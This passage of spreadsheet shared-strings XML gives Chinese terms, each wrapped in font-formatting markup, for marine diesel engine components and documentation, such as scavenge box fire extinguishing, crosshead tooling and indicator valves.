    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>CO2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱板材</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱端部罩壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱放泄主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱和单元箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱后部管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱灭火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱灭火器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱灭火系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱水雾灭火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱筒体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱着火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱蒸气灭火</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气压力的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ISO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>砂轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>筛选器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部安装建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部操纵侧顶部支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部操纵侧平台</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部操纵侧走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部挡油环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部刮环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部后侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部后侧走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部链传动加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部链轮驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部排气侧管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部排气侧平台</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部排气侧走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部平台</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部甩油环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部罩壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部轴承座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部轴瓦</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部主轴承工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部总成起吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部走台外形图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部走台支架及管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧力矩标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧要求规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧仪表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上紧装置，喷嘴螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备安全报警检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备规格数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设计信息</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>升级说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>升降凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>生产文件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>生产文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>生物燃料规格说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>声音测量曲线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字交叉接头</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头，连杆工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头导板的校中</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头导销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头的支架，支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头吊具试验规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头端部液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头端工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头发动机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头滑油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头及连杆工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头加工说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头壳体支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头瓦吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头橡胶盖</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修复</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头悬吊链条</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头液压拉伸器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头油锁止工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头运输工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头支撑试验规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承白合金</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承盖吊具试验规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>石棉绳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>时钟</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>实验</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>使用手册</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀的检修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀细部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功器补充图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功驱动的校准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功凸轮</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功系统布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示位器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
